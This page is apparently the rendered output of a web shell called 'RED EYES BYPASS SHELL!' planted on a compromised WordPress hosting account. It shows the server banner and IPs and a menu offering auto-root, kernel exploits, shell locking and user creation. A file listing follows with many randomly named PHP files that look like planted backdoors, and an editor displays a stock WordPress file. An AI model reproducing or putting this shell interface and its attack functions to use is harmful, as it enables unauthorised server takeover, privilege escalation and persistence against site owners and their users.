Linux webm003.cluster107.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
Apache
: 10.107.20.3 | : 216.73.216.205
Cant Read [ /etc/named.conf ]
hexamanupu
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
hexamanupu /
www /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
.tmb136b63
[ DIR ]
dr--r--r--
0aebe
[ DIR ]
dr-xr-xr-x
boss2026yt
[ DIR ]
drwxr-xr-x
br2026yt
[ DIR ]
drwxr-xr-x
well-known64380a
[ DIR ]
drwxr-xr-x
wp-admina6fe9c
[ DIR ]
drwxr-xr-x
wp-contentd9f11e
[ DIR ]
drwxr-xr-x
wp-includes
[ DIR ]
drwxr-xr-x
wp-includes439bd5
[ DIR ]
drwxr-xr-x
.htaccess
1.13
KB
-r-xr-xr-x
1.txt90658f
6
B
-rw-r--r--
222.php148e7d
15.76
KB
-rw-r--r--
9a1c6959dd25dd44842341d12f8450f1123b96
52
B
-rw-r--r--
TSuUh.phpd6f0ac
1.29
KB
-rw-r--r--
adminner.php1a0298
67.86
KB
-rw-r--r--
buy.php
1.46
KB
-r--r--r--
click.php
2
KB
-r--r--r--
defaults.php
1.93
KB
-r--r--r--
detail.php6ef055
24.29
KB
-rw-r--r--
googlebb3efcc4a0a209ca.htmla91c0f
53
B
-rw-r--r--
googled3df579f0171ab33.html
53
B
-rw-r--r--
hyBQG.phpe01f9e
1.29
KB
-rw-r--r--
iNtsg68ea5e
0
B
-rw-r--r--
index.php
12.42
KB
-r-xr-xr-x
jDITV9a0428
0
B
-rw-r--r--
license.txt4e74c3
19.44
KB
-rw-r--r--
lowpr.php19a55f
1.02
KB
-rw-r--r--
o647ye.phpdf04ec
50.63
KB
-rw-r--r--
product.php
1.87
KB
-r--r--r--
products.php971220
24.27
KB
-rw-r--r--
readme.html6a3328
7.23
KB
-rw-r--r--
robots.txt
353
B
-r--r--r--
robots.txt20ee9a
253
B
-rw-r--r--
wp-activate.php98279c
7.2
KB
-rw-r--r--
wp-blog-header.php6c8f6c
351
B
-rw----r--
wp-comments-post.phpf14dc2
2.27
KB
-rw----r--
wp-config-sample.phpd4b29c
3.26
KB
-rw-r--r--
wp-config.php42c3c6
2.37
KB
-rw-------
wp-cron.php19ea39
5.49
KB
-rw-r--r--
wp-ea37bw5k.php577c7d
50.23
KB
-rw-r--r--
wp-links-opml.phpd96cfb
2.43
KB
-rw-r--r--
wp-load.php96508f
3.84
KB
-rw-r--r--
wp-mail.php16ec9d
8.52
KB
-rw-r--r--
wp-settings.php9dcb2a
31.88
KB
-rw-r--r--
wp-signup.phpf7d432
33.81
KB
-rw-r--r--
wp-stat.php100027
164.14
KB
-rw-r--r--
wp-trackback.phpe9792f
5.09
KB
-rw-r--r--
wp-ttcxamxv.phpdc52b7
50.63
KB
-rw-r--r--
wp-v3qnqww.php23f0a7
50.23
KB
-rw-r--r--
wp-wkajepch.php96032d
50.63
KB
-rw-r--r--
wrsou2x3.phpf6e7b4
50.23
KB
-rw-r--r--
xmlrpc.php005bca
3.13
KB
-rw-r--r--
xmlrpc_bkp.php705619
1.04
KB
-rw-r--r--
xxmlrpc.phpf91f16
1.04
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : wp-links-opml.phpd96cfb
<?php /** * Outputs the OPML XML format for getting the links defined in the link * administration. This can be used to export links from one blog over to * another. Links aren't exported by the WordPress export, so this file handles * that. * * This file is not added by default to WordPress theme pages when outputting * feed links. It will have to be added manually for browsers and users to pick * up that this file exists. * * @package WordPress */ require_once __DIR__ . '/wp-load.php'; header( 'Content-Type: text/xml; charset=' . get_option( 'blog_charset' ), true ); $link_cat = ''; if ( ! empty( $_GET['link_cat'] ) ) { $link_cat = $_GET['link_cat']; if ( ! in_array( $link_cat, array( 'all', '0' ), true ) ) { $link_cat = absint( urldecode( $link_cat ) ); } } echo '<?xml version="1.0"?' . ">\n"; ?> <opml version="1.0"> <head> <title> <?php /* translators: %s: Site title. */ printf( __( 'Links for %s' ), esc_attr( get_bloginfo( 'name', 'display' ) ) ); ?> </title> <dateCreated><?php echo gmdate( 'D, d M Y H:i:s' ); ?> GMT</dateCreated> <?php /** * Fires in the OPML header. * * @since 3.0.0 */ do_action( 'opml_head' ); ?> </head> <body> <?php if ( empty( $link_cat ) ) { $cats = get_categories( array( 'taxonomy' => 'link_category', 'hierarchical' => 0, ) ); } else { $cats = get_categories( array( 'taxonomy' => 'link_category', 'hierarchical' => 0, 'include' => $link_cat, ) ); } foreach ( (array) $cats as $cat ) : /** This filter is documented in wp-includes/bookmark-template.php */ $catname = apply_filters( 'link_category', $cat->name ); ?> <outline type="category" title="<?php echo esc_attr( $catname ); ?>"> <?php $bookmarks = get_bookmarks( array( 'category' => $cat->term_id ) ); foreach ( (array) $bookmarks as $bookmark ) : /** * Filters the OPML outline link title text. * * @since 2.2.0 * * @param string $title The OPML outline title text. */ $title = apply_filters( 'link_title', $bookmark->link_name ); ?> <outline text="<?php echo esc_attr( $title ); ?>" type="link" xmlUrl="<?php echo esc_url( $bookmark->link_rss ); ?>" htmlUrl="<?php echo esc_url( $bookmark->link_url ); ?>" updated=" <?php if ( '0000-00-00 00:00:00' !== $bookmark->link_updated ) { echo $bookmark->link_updated; } ?> " /> <?php endforeach; // $bookmarks ?> </outline> <?php endforeach; // $cats ?> </body> </opml>
Close